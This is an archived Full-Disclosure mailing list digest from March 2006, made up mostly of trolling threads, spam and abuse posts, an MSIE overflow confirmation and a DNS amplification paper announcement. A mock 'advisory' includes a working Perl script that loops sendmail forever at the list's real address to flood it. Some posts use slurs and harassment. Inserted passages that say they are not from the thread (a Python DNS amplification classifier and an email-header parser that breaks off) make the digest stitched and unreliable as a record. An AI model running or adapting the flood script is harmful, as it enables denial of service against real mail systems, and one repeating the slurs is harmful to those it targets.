[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread Konstantine
On 3/16/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> For non-believers, there's a short but fiery demonstration page available
> at http://lcamtuf.coredump.cx/iedie.html (yes, it will probably crash your
> browser).

Confirmed with 6.0.2900.2180.xpsp_sp2-gdr.050301-1519 on XPSP2
K.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down accountinformation

2006-03-17 Thread n3td3v
After I write data, I rarely have incentive to read the data before it's submitted via the www communications network.

I prefer freestyle, you know, and that way it gives scope for bored office workers to poke holes in the n3td3v agenda.

I mean, I don't want folks to feel left out of the n3td3v phenomena.

Let's keep the big corporations happy with the window of opportunity for criticism open for the time being.
I encourage folks to be critical, it adheres to the freedom of speech I believe in, that the FD admin Mr Cartwright is currently ignoring, by trying to gag all n3td3v correspondence to the outside world.

And to think UK peoples stick together against the AMERICAN invasion. Let's forget that, especially when John Cartwright is concerned.

At least I'm running the biggest security operation on Google Groups, allowing me to push out information to the international community at timely releases.

John Cartwright eat your heart out.

REGARDS,

n3td3v
 
On 3/18/06, Sean Crawford <[EMAIL PROTECTED]> wrote:


LOL..
Do you mean refuse? Or do you think Yahoo keeps all its garbage in some kind of citadel?
; )

Sean.

- Original Message -
From: netdev

However, if you want to get into the criminal element of how paperwork is obtained, it's often caught at refuge sites at dot coms, in the same way fraud is carried out to obtain credit card info via receipts.


Re: [Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread Valdis . Kletnieks
On Sat, 18 Mar 2006 02:31:37 +0100, poo said:

> i also know how to convert a cow into bacon !!!

Obligatory full disclosure:

Cows go MOOO. Pigs go OINK. Bacon comes from the one that goes OINK.

Unless you have a really clever DNA sequencer hack to do the conversion,
in which case full disclosure obligates you to tell us the gene offsets to use



Re: [Full-disclosure] Yahoo recommends you write down accountinformation

2006-03-17 Thread Sean Crawford



LOL..
Do you mean refuse? Or do you think Yahoo keeps all its garbage in some kind of citadel?
; )
Sean.

  - Original Message -
  From: netdev

  However, if you want to get into the criminal element of how paperwork is
  obtained, it's often caught at refuge sites at dot coms, in the
  same way fraud is carried out to obtain credit card info via
  receipts.

Re: [Full-disclosure] MSN Passport Cert improperly issued

2006-03-17 Thread Nick FitzGerald
Babak Pasdar wrote:

> It seems that MSN's cert for private login to the passport site is
> issued for the wrong domain.  

So?

Given what that cert means even if it is "right" (i.e. diddly squat -- 
basically someone paid some money to a company that your browser 
recognizes as a CA), it tells you nothing really important, so why 
sweat it being "wrong"?


Regards,

Nick FitzGerald



Re: [Full-disclosure] Yahoo recommends you write down account information

2006-03-17 Thread n3td3v
Like I marked up earlier in this thread, it's not about how an account would be compromised. It was PHUN pointed at peoples I REGULARLY post to off list on a politically incorrect stance of having different wordings between Yahoo teams.

The highlight of the thread is that once again I've proved Yahoo does not co-ordinate, as I have ranted about on the n3td3v blog before I killed off the trend of blogging.

Politically, a security team hates for the outside world to know they aren't co-ordinated. The same goes for the number and skill level of incident response staff they have on stand-by at certain times of year.

However, if you want to get into the criminal element of how paperwork is obtained, it's often caught at refuge sites at dot coms, in the same way fraud is carried out to obtain credit card info via receipts.

And you can bet Yahoo Inc have no CCTV at their refuge areas, in the same way they don't take the threat of folks following folks home to break into homes and steal hardware, in the same way they don't check for folks standing outside Sunnyvale for peoples looking for insecure wireless connections, and in the same way they don't take the threat from rogue employees feeding out information from within to third party groups who are offering them money.

Many folks in the industry separate CRIMINALS from cyber threats (ie: hackers), although both are the same. You need to be tripping if you think someone behind a computer wouldn't raid a corporate refuge area, to later go back to a computer to compromise an account.

In the same way it's trippy to think there's not Yahoo employees harvesting paper work information for third parties.

It's time for the industry to wake up to the fact that "cross criminality" exists in computer crimes, and stop thinking say, phishing is equal to criminals, while exploit code is equal to hackers.

On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

I did read them, and this again enforces my point, you guys are just trolls. Nobody takes you guys seriously. Provide me with a legitimate situation, in which a 'bad guy' has access to physically printed out documents, and the mailbox of the user, where he could not simply either install a keylogger, sniff the passwords off the network, or get them from the system.
The truth is, Yahoo uses this as a way to prevent annoyance. I'd suspect if they DIDN'T ask for this information n3td3v would be on here claiming that it was a DoS vulnerability or some comparable bullshit. Anyways, great troll, but this is an old meme, so let's keep moving the FDRUIN forward, shall we?

On 3/17/06, n3td3v <[EMAIL PROTECTED]> wrote:

Didn't you read this http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8 before you carried out your own sector of trolling?

Please keep politically correct on FD, otherwise, the CERT folks might get worried :P

On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!

On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

Do you blow everything out of proportion like this? How old must you be to have this attitude.

On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group <[EMAIL PROTECTED]> wrote:
> You're Yahoo's top security advisor, who I talk to every day off
> the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON
> ONLINE FORMS?
>
> I think you're missing the point. The account information YAHOO
> ask users to print out is the ACTUAL information on the users
> ACCOUNT table.
>
> SURE, folks can type COMPLETE crap in their registration for
> signing up to a Yahoo account, but whatever information is
> submitted to the Yahoo account, it is the TRUE information that
> would give access to that account.
>
> SO, no matter the trend of users giving BOGUS information to
> sign up for an account, the only people who would print out
> information is people who would have submitted TRUE information.
> Otherwise, why would they print out info they knew was bogus?
>
> MARK, you're Yahoo's top security advisor, and I respect you off
> the record, but coming on here trying to defend Yahoo's sec pros
> for getting it totally wrong in their CONTRADICTION between sites
> is totally wrong.
>
> Yahoo said the wording "DON'T WRITE DOWN YOUR PASSWORD" but on
> the registration procedure it says "YAHOO RECOMMEND YOU WRITE
> DOWN YOUR ACCOUNT INFORMATION"
>
> YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A
> CORPORATION GOT IT WRONG.
>
> I speak to you every day off list, but going off on your own
> crusade won't make the rest of the Yahoo security team like you
> better.
>
> SEE YOU OFF LIST SEIDEN.
>
> Sorry to everyone else, this is part of an off list argument
> that Yahoo's top advisor can't get a grip of.
>
> (How di

Re: [Full-disclosure] Yahoo recommends you write down account information

2006-03-17 Thread MR BABS
I did read them, and this again enforces my point, you guys are just trolls. Nobody takes you guys seriously. Provide me with a legitimate situation, in which a 'bad guy' has access to physically printed out documents, and the mailbox of the user, where he could not simply either install a keylogger, sniff the passwords off the network, or get them from the system.
The truth is, Yahoo uses this as a way to prevent annoyance. I'd suspect if they DIDN'T ask for this information n3td3v would be on here claiming that it was a DoS vulnerability or some comparable bullshit. Anyways, great troll, but this is an old meme, so let's keep moving the FDRUIN forward, shall we?

On 3/17/06, n3td3v <[EMAIL PROTECTED]> wrote:

Didn't you read this http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8 before you carried out your own sector of trolling?

Please keep politically correct on FD, otherwise, the CERT folks might get worried :P

On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!

On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

Do you blow everything out of proportion like this? How old must you be to have this attitude.

On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group <[EMAIL PROTECTED]> wrote:
> You're Yahoo's top security advisor, who I talk to every day off
> the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON
> ONLINE FORMS?
>
> I think you're missing the point. The account information YAHOO
> ask users to print out is the ACTUAL information on the users
> ACCOUNT table.
>
> SURE, folks can type COMPLETE crap in their registration for
> signing up to a Yahoo account, but whatever information is
> submitted to the Yahoo account, it is the TRUE information that
> would give access to that account.
>
> SO, no matter the trend of users giving BOGUS information to
> sign up for an account, the only people who would print out
> information is people who would have submitted TRUE information.
> Otherwise, why would they print out info they knew was bogus?
>
> MARK, you're Yahoo's top security advisor, and I respect you off
> the record, but coming on here trying to defend Yahoo's sec pros
> for getting it totally wrong in their CONTRADICTION between sites
> is totally wrong.
>
> Yahoo said the wording "DON'T WRITE DOWN YOUR PASSWORD" but on
> the registration procedure it says "YAHOO RECOMMEND YOU WRITE
> DOWN YOUR ACCOUNT INFORMATION"
>
> YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A
> CORPORATION GOT IT WRONG.
>
> I speak to you every day off list, but going off on your own
> crusade won't make the rest of the Yahoo security team like you
> better.
>
> SEE YOU OFF LIST SEIDEN.
>
> Sorry to everyone else, this is part of an off list argument
> that Yahoo's top advisor can't get a grip of.
>
> (How did you become Yahoo's top security advisor? :P)
>
> SEE YOU OFF LIST
>
> Bye
>
> [EMAIL PROTECTED] wrote:
> > a certain number of people lie about their birthdate and
> > zipcode, or they forget just what they lied about, or move from
> > place to place and forgot where they lived when they registered,
> > and they don't have a working alternate email address.



Re: [Full-disclosure] Yahoo recommends you write down account information

2006-03-17 Thread n3td3v
Didn't you read this http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8 before you carried out your own sector of trolling?

Please keep politically correct on FD, otherwise, the CERT folks might get worried :P

On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!

On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

Do you blow everything out of proportion like this? How old must you be to have this attitude.

On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group <[EMAIL PROTECTED]> wrote:
> You're Yahoo's top security advisor, who I talk to every day off
> the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON
> ONLINE FORMS?
>
> I think you're missing the point. The account information YAHOO
> ask users to print out is the ACTUAL information on the users
> ACCOUNT table.
>
> SURE, folks can type COMPLETE crap in their registration for
> signing up to a Yahoo account, but whatever information is
> submitted to the Yahoo account, it is the TRUE information that
> would give access to that account.
>
> SO, no matter the trend of users giving BOGUS information to
> sign up for an account, the only people who would print out
> information is people who would have submitted TRUE information.
> Otherwise, why would they print out info they knew was bogus?
>
> MARK, you're Yahoo's top security advisor, and I respect you off
> the record, but coming on here trying to defend Yahoo's sec pros
> for getting it totally wrong in their CONTRADICTION between sites
> is totally wrong.
>
> Yahoo said the wording "DON'T WRITE DOWN YOUR PASSWORD" but on
> the registration procedure it says "YAHOO RECOMMEND YOU WRITE
> DOWN YOUR ACCOUNT INFORMATION"
>
> YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A
> CORPORATION GOT IT WRONG.
>
> I speak to you every day off list, but going off on your own
> crusade won't make the rest of the Yahoo security team like you
> better.
>
> SEE YOU OFF LIST SEIDEN.
>
> Sorry to everyone else, this is part of an off list argument
> that Yahoo's top advisor can't get a grip of.
>
> (How did you become Yahoo's top security advisor? :P)
>
> SEE YOU OFF LIST
>
> Bye
>
> [EMAIL PROTECTED] wrote:
> > a certain number of people lie about their birthdate and
> > zipcode, or they forget just what they lied about, or move from
> > place to place and forgot where they lived when they registered,
> > and they don't have a working alternate email address.


Re: [Full-disclosure] Yahoo recommends you write down account information

2006-03-17 Thread MR BABS
WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!

On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

Do you blow everything out of proportion like this? How old must you be to have this attitude.

On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group <[EMAIL PROTECTED]> wrote:
> You're Yahoo's top security advisor, who I talk to every day off
> the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON
> ONLINE FORMS?
>
> I think you're missing the point. The account information YAHOO
> ask users to print out is the ACTUAL information on the users
> ACCOUNT table.
>
> SURE, folks can type COMPLETE crap in their registration for
> signing up to a Yahoo account, but whatever information is
> submitted to the Yahoo account, it is the TRUE information that
> would give access to that account.
>
> SO, no matter the trend of users giving BOGUS information to
> sign up for an account, the only people who would print out
> information is people who would have submitted TRUE information.
> Otherwise, why would they print out info they knew was bogus?
>
> MARK, you're Yahoo's top security advisor, and I respect you off
> the record, but coming on here trying to defend Yahoo's sec pros
> for getting it totally wrong in their CONTRADICTION between sites
> is totally wrong.
>
> Yahoo said the wording "DON'T WRITE DOWN YOUR PASSWORD" but on
> the registration procedure it says "YAHOO RECOMMEND YOU WRITE
> DOWN YOUR ACCOUNT INFORMATION"
>
> YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A
> CORPORATION GOT IT WRONG.
>
> I speak to you every day off list, but going off on your own
> crusade won't make the rest of the Yahoo security team like you
> better.
>
> SEE YOU OFF LIST SEIDEN.
>
> Sorry to everyone else, this is part of an off list argument
> that Yahoo's top advisor can't get a grip of.
>
> (How did you become Yahoo's top security advisor? :P)
>
> SEE YOU OFF LIST
>
> Bye
>
> [EMAIL PROTECTED] wrote:
> > a certain number of people lie about their birthdate and
> > zipcode, or they forget just what they lied about, or move from
> > place to place and forgot where they lived when they registered,
> > and they don't have a working alternate email address.

Re: [Full-disclosure] MSN Passport Cert improperly issued

2006-03-17 Thread Tim
> Get better connection little cry girl.

Jackass: Get a clue. 

We aren't talking about my connection.  We're talking about the
bandwidth of the free service that allows you to make a fool of yourself
in front of thousands of people.

tim



[Full-disclosure] Fwd: Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

2006-03-17 Thread n3td3v
-- Forwarded message --
From: n3td3v <[EMAIL PROTECTED]>
Date: Mar 18, 2006 2:41 AM
Subject: Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit
To: full-disclosure@lists.netsys.com

Greets,
 
n3td3v group has no association with #bantown and asks them to retract references to n3td3v group in future source code mark ups.

I also ask them to retract from using "3 3" which is obviously secret code to suggest n3td3v group is involved in your malicious activities.

Mucha love,

n3td3v

American kids nowadays. I blame hormone induced beef which McDonald's and Burger King use for their Happy Meals.

3 3 <[EMAIL PROTECTED]> wrote:
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.

Re: [Full-disclosure] Fw: You have been unsubscribed from the Full-Disclosure mailing list

2006-03-17 Thread poo
goodbye and good riddance :)))
On 3/18/06, Jason Coombs <[EMAIL PROTECTED]> wrote:
[Full-Disclosure] is dead.

Long live full disclosure.

-Original Message-
From: [EMAIL PROTECTED]
Date: Sat, 18 Mar 2006 00:01:39
To: [EMAIL PROTECTED]
Subject: You have been unsubscribed from the Full-Disclosure mailing list

For quality control purposes please send mail to [EMAIL PROTECTED] and
tell us why you're unsubscribing. Thanks!

--
smile tomorrow will be worse

Re: [Full-disclosure] is FD Moderated now?

2006-03-17 Thread poo
moderated??? are you asking if this is faghat centra now??
On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

Hey Guys
Is full disclosure moderated list now?

--
smile tomorrow will be worse

[Full-disclosure] Fwd: Your message to Full-Disclosure awaits moderator approval

2006-03-17 Thread n3td3v group
-- Forwarded message --
From: [EMAIL PROTECTED] <[EMAIL PROTECTED]>
Date: Mar 18, 2006 12:47 AM
Subject: Your message to Full-Disclosure awaits moderator approval

Your mail to 'Full-Disclosure' with the subject

Re: greetz

Is being held until the list moderator can review it for approval.

The reason it is being held:

Post to moderated list

Re: [Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-17 Thread poo
of course you have!!!
i also know how to convert a cow into bacon !!! 
On 3/17/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
On Thu, 16 Mar 2006, Michal Zalewski wrote:
> This might not come as a surprise, but there appears to be a *very*
> interesting and apparently very much exploitable overflow in Microsoft
> Internet Explorer (mshtml.dll).

I'd like to make a self-serving statement in response to dozens of people
who pointed out that this month, iDefense pays $10,000 per any
vulnerability that would result in a Microsoft security advisory rated
"critical"...

YES, I HAVE THIS KNOWLEDGE.

I simply do not subscribe to that way of making money. It might be that
I'm insane or dumb, but it feels good.

Regards,
/mz
http://lcamtuf.coredump.cx/

--
smile tomorrow will be worse

[Full-disclosure] Fw: You have been unsubscribed from the Full-Disclosure mailing list

2006-03-17 Thread Jason Coombs
[Full-Disclosure] is dead.

Long live full disclosure.

-Original Message-
From: [EMAIL PROTECTED]
Date: Sat, 18 Mar 2006 00:01:39 
To:[EMAIL PROTECTED]
Subject: You have been unsubscribed from the Full-Disclosure mailing list

For quality control purposes please send mail to [EMAIL PROTECTED] and
tell us why you're unsubscribing. Thanks!



[Full-disclosure] Fwd: greetz

2006-03-17 Thread n3td3v group
-- Forwarded message --
From: n3td3v <[EMAIL PROTECTED]>
Date: Mar 18, 2006 12:47 AM
Subject: Re: greetz
To: full-disclosure@lists.grok.org.uk

Get back to IRC kiddie hacker...

n3td3v group are elite experts in the security industry.

While our name might attract the kiddie community, we're far from
having relations with people such as yourself.

We suggest you stop spamming Full-Disclosure and get back to AOL Chat,
where you guys originated from.

Otherwise, I'll inform your ISP, and your ISP will inform your mom and
dad what you're up to on their Walmart Desktop PC, and then your mom
and dad will spank you, for being so childish.

Disconnect you from the internet and send you to Bratcamp.

On 3/17/06, 3 3 <[EMAIL PROTECTED]> wrote:
> LOL THX N3TD3V
>
> YOU FUCKING FAIL: YOU WHITEHAT PILE OF SHIT.
> YOUR ADVISORY TROLLS GENERATE SO MUCH HATE. IT'S GREAT!
>
> AND THESE WHITEHAT FAGGOTS CAN'T TELL: LOLOLOL
>
> U-R NUMBAR WAN TROLL.

[Full-disclosure] is FD Moderated now?

2006-03-17 Thread MR BABS
Hey Guys
Is full disclosure moderated list now?

[Full-disclosure] DNS Amplification Attacks

2006-03-17 Thread Gadi Evron

In this paper we address in detail how the recent DNS DDoS attacks work:
how they abuse name servers, EDNS, the recursive feature and UDP packet
spoofing, as well as how the amplification effect works.

Our study is based on packet captures (we provide samples) and logs
from attacks on different networks reported to have a volume of 2.8Gbps.
One of these networks indicated some attacks have reached as high as
10Gbps and used as many as 140,000 exploited name servers.

In the conclusions we also discuss some remediation suggestions.

Given recent events, we have been encouraged to make this text available
at this time.


URL: http://www.isotf.org/news/DNS-Amplification-Attacks.pdf

Please note that this version of this paper is prior to submission for 
publication and that the final version may see significant revisions.


Thanks,

Randy Vaughn and Gadi Evron.
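As an added, defender-side illustration of the ingredients the abstract lists (EDNS, the recursive feature, UDP spoofing and the amplification effect), the following Python parser scores one DNS query/response pair for those conditions; it is an example written for this archive page, not code from the paper or its authors. The name `amp-test.example`, the TXT record contents, the 4096-byte buffer and the 10x threshold are constructed assumptions, and nothing is sent on the network.

```python
"""Score one DNS query/response pair for the ingredients the abstract names:
recursion offered to the asker, a large EDNS0 UDP payload advertised, and a
response many times the size of the (spoofable) UDP query. Nothing is sent."""
import struct

FLAG_QR = 0x8000  # message is a response (RFC 1035 section 4.1.1)
FLAG_RD = 0x0100  # recursion desired, set by the client
FLAG_RA = 0x0080  # recursion available, set by a resolver that recurses for the asker
TYPE_TXT, TYPE_OPT, TYPE_ANY = 16, 41, 255


def encode_name(name):
    """'a.example' -> b'\\x01a\\x07example\\x00' (RFC 1035 label format)."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def decode_name(msg, off):
    """Decode a possibly compressed name at off; return (name, offset after the field)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 section 4.1.4)
            end = end or off + 2  # the field ends right after the first pointer
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), end or off


def parse_message(msg):
    """Header flags, questions, answer count and EDNS0 UDP payload size of a message."""
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    off, questions, edns_udp_size = 12, [], None
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype = struct.unpack("!HH", msg[off:off + 4])[0]
        off += 4
        questions.append((name, qtype))
    for _ in range(an + ns + ar):  # answer, authority and additional sections
        _owner, off = decode_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10 + rdlen
        if rtype == TYPE_OPT:  # OPT pseudo-RR: its CLASS field is the UDP payload size
            edns_udp_size = rclass
    return {"id": ident, "rd": bool(flags & FLAG_RD), "ra": bool(flags & FLAG_RA),
            "questions": questions, "answer_count": an, "edns_udp_size": edns_udp_size}


def build_query(name, qtype, ident=0x1234, edns_udp_size=4096):
    """Constructed query: one question, RD set; edns_udp_size=None omits the OPT RR."""
    arcount = 0 if edns_udp_size is None else 1
    msg = struct.pack("!6H", ident, FLAG_RD, 1, 0, 0, arcount)
    msg += encode_name(name) + struct.pack("!HH", qtype, 1)
    if edns_udp_size is not None:
        # OPT RR: root owner name, TYPE 41, CLASS = UDP payload size, TTL 0, empty RDATA
        msg += b"\x00" + struct.pack("!HHIH", TYPE_OPT, edns_udp_size, 0, 0)
    return msg


def build_response(query, txt_records):
    """Constructed response: echoes the question, sets RA, one TXT RR per string."""
    q = parse_message(query)
    name, qtype = q["questions"][0]
    msg = struct.pack("!6H", q["id"], FLAG_QR | FLAG_RD | FLAG_RA,
                      1, len(txt_records), 0, 0)
    msg += encode_name(name) + struct.pack("!HH", qtype, 1)
    for text in txt_records:
        data = text.encode("ascii")
        # TXT RDATA is a sequence of <length byte><up to 255 bytes> character-strings
        rdata = b"".join(bytes([len(data[i:i + 255])]) + data[i:i + 255]
                         for i in range(0, len(data), 255))
        # 0xC00C is a compression pointer to the owner name at offset 12 (the question)
        msg += b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, 1, 3600, len(rdata)) + rdata
    return msg


def classify(query, response, threshold=10.0):
    """Return (bytes returned per byte sent, list of findings) for one pair."""
    q, r = parse_message(query), parse_message(response)
    factor = len(response) / len(query)
    findings = []
    if q["rd"] and r["ra"]:
        findings.append("recursion offered to this client")
    if q["edns_udp_size"] is not None and q["edns_udp_size"] > 512:
        findings.append("EDNS0 UDP payload %d > 512 bytes" % q["edns_udp_size"])
    if factor >= threshold:
        findings.append("amplification %.1fx" % factor)
    return factor, findings


def sample_pair():
    """Constructed worst case (made-up name and contents): ANY query with a 4096-byte
    EDNS0 buffer answered by three 1000-character TXT records."""
    query = build_query("amp-test.example", TYPE_ANY)
    return query, build_response(query, ["x" * 1000] * 3)
```

Running `classify(*sample_pair())` reports a 45-byte query answered by 3082 bytes, roughly 68x, with all three conditions flagged; a plain TXT query without EDNS0 answered by a short record scores under 2x and is flagged only for recursion.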



Re: [Full-disclosure] Furry FD Porn Copyright J.W. Bernal

2006-03-17 Thread bigdaddyzeroday
ASL?

OMGWTFBBQ

On Fri, 17 Mar 2006 14:43:00 -0800 Steve Friedl <[EMAIL PROTECTED]> 
wrote:
>On Fri, Mar 17, 2006 at 05:39:33PM -0500, 3 3 wrote:
>> =]
>
>Somebody forgot to include "NSFW"
>
>I guess FD is now officially just an AOL chat room, right?
>
>-- 
>Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 
>544-6561
>www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | 
>[EMAIL PROTECTED]
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/





Re: [Full-disclosure] MSN Passport Cert improperly issued

2006-03-17 Thread bigdaddyzeroday
Get better connection little cry girl.

On Fri, 17 Mar 2006 07:56:38 -0800 Tim wrote:
>Do you have any idea how many people are subscribed to this list?  When
>you attach even a slightly large file to your emails, you amplify that
>traffic several hundred(thousand?)-fold.  Many people on the list may
>not give a shit about your post. (Although this one is moderately
>interesting.)  It is just a big waste of bandwidth for this free
>service.
>
>Please be polite and post your jpg to your website, and provide a link.
>Email was never intended for file transfer in the first place, and isn't
>particularly efficient at it.
>
>thanks,
>tim
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/





[Full-disclosure] Re: More JW Bernal Furry Sex 0day PORN! (3 3)

2006-03-17 Thread Vympel

Why don't you send these pictures to a porn site?
This is a security mailing list, lamma.




Re: [Full-disclosure] Filtering Latest Spam Run (radio.toad.com)

2006-03-17 Thread bigdaddyzeroday
No he not. He just dick sucker who like think he cool.

On Thu, 16 Mar 2006 12:11:07 -0800 Damian Gerow 
<[EMAIL PROTECTED]> wrote:
>Thus spake Jason Coombs ([EMAIL PROTECTED]) [16/03/06 04:33]:
>: uh huh, and now we know the spam kiddie responsible. I pay by the KB to
>: receive all your junk, so you can expect a lawsuit in the near future.
>
>You pay by the KB and subscribe to FD?
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/





[Full-disclosure] WhiteHat Scum is Jerking OFF

2006-03-17 Thread 3 3
WhiteHat Scum is Jerking OFF

Re: [Full-disclosure] CopyRight Furry Porn!

2006-03-17 Thread bigdaddyzeroday
Why not attach a malicious image file? More laughs if that works.

On Fri, 17 Mar 2006 15:04:08 -0800 3 3 <[EMAIL PROTECTED]> wrote:
>ruin





[Full-disclosure] CopyRight Furry Porn!

2006-03-17 Thread 3 3
fap

[Full-disclosure] CopyRight Furry Porn!

2006-03-17 Thread 3 3
Ruin=]

[Full-disclosure] CopyRight Furry Porn!

2006-03-17 Thread 3 3
Ruin!

Re: [Full-disclosure] Furry FD Porn Copyright J.W. Bernal

2006-03-17 Thread Steve Friedl
On Fri, Mar 17, 2006 at 05:39:33PM -0500, 3 3 wrote:
> =]

Somebody forgot to include "NSFW"

I guess FD is now officially just an AOL chat room, right?

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]



[Full-disclosure] Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

2006-03-17 Thread 3 3
Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

== 1. Description ==

It is possible to flood Full Disclosure Mailing List via the SMTP protocol,
causing possible buffer overflow, probable disk write failure, and definite DoS.

== 2. Solution ==

The clear solution, as per Bantown security, is to moderate all mailing lists
for an until the ESMTP MTA developers can reach a better solution.

== 3. History ==

Mar 13, 2006 [+] Vendor Notification.
Mar 13, 2006 [+] Public Disclosure.

== 4. PoC ==

#!/usr/bin/perl
#
# SMTP FLOOD PoC
# by Jmax, Bantown Security, INC.
#
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.

use warnings;
use strict;
use Mail::Sendmail;

my %mail = (
    from    => '[EMAIL PROTECTED]',
    to      => 'full-disclosure@lists.grok.org.uk',
    subject => 'SMTP FLOOD PoC',
);

while (1) {
    sendmail(%mail);
}

== A. References ==

RFC 821

== B. Contact ==

Jmax, Bantown Security, INC.
[EMAIL PROTECTED]
1-888-565-9428
GSAE GREM SSP-CNSA CAP SSCP

Re: [Full-disclosure] Re: Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=%Buffer Overflow in Microsoft Access

2006-03-17 Thread Valdis . Kletnieks
On Fri, 17 Mar 2006 20:14:35 GMT, Dave Korn said:

>   Ah, well, that wasn't exactly obvious from the Received header that you 
> posted, now was it?!  Heh, that was one vital piece of info without which 
> nobody could be sure they understood exactly what it was that you were 
> showing us.  I thought it might have been a quote from one of the headers of 
> one of the spams!

Actually, the fact that the Received: header showed that the toad.com machine
accepted the mail, combined with the fact that it then forwarded the mail
to the list (else we'd not have *seen* the Received: in question), combine to
tell us one of 3 things:

1) Somebody telnet'ed to the *next* machine's port 25 and forged that Received:
line (somewhat unlikely, as that box said 'received from toad.com').  Of course,
you can only *really* trust headers added by boxes you control, but in this case
things look fairly kosher up to where lists.grok.org.uk accepts the mail, and
there's no obvious reason to disbelieve its Received: line.

2) The entity giving it to toad.com performed some variant of SMTP AUTH,
convincing toad.com they were a legitimate user and allowed to relay outbound.

3) It's an open relay/proxy.

Incidentally, the single Received: line I posted was actually for the
German Tor box rather than toad.com. :)


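The three possibilities Valdis lists all rest on which Received: lines corroborate each other: a line is only worth anything if a later hop you trust says it received the mail from the host that stamped it. The following added example, not from the thread, walks a header chain from a trusted hop and stops at the first line no later hop vouches for. The headers, host names and addresses are constructed for the example (RFC 5737 documentation ranges).

```python
import re
from typing import List, Optional, Tuple

# Constructed sample headers, modelled on the hops discussed in this thread
# (the list server, toad.com, and an anonymising box in front of it).  Host
# names are made up and the addresses are RFC 5737 documentation ranges.
SAMPLE_HEADERS = """\
Received: from toad.com (toad.com [192.0.2.10])
\tby lists.grok.org.uk with ESMTP id 4F2A1B7
\tfor <full-disclosure@lists.grok.org.uk>; Thu, 16 Mar 2006 13:30:01 +0000
Received: from tor-exit.example.de (tor-exit.example.de [198.51.100.7])
\tby toad.com with SMTP id k2GDTxyz
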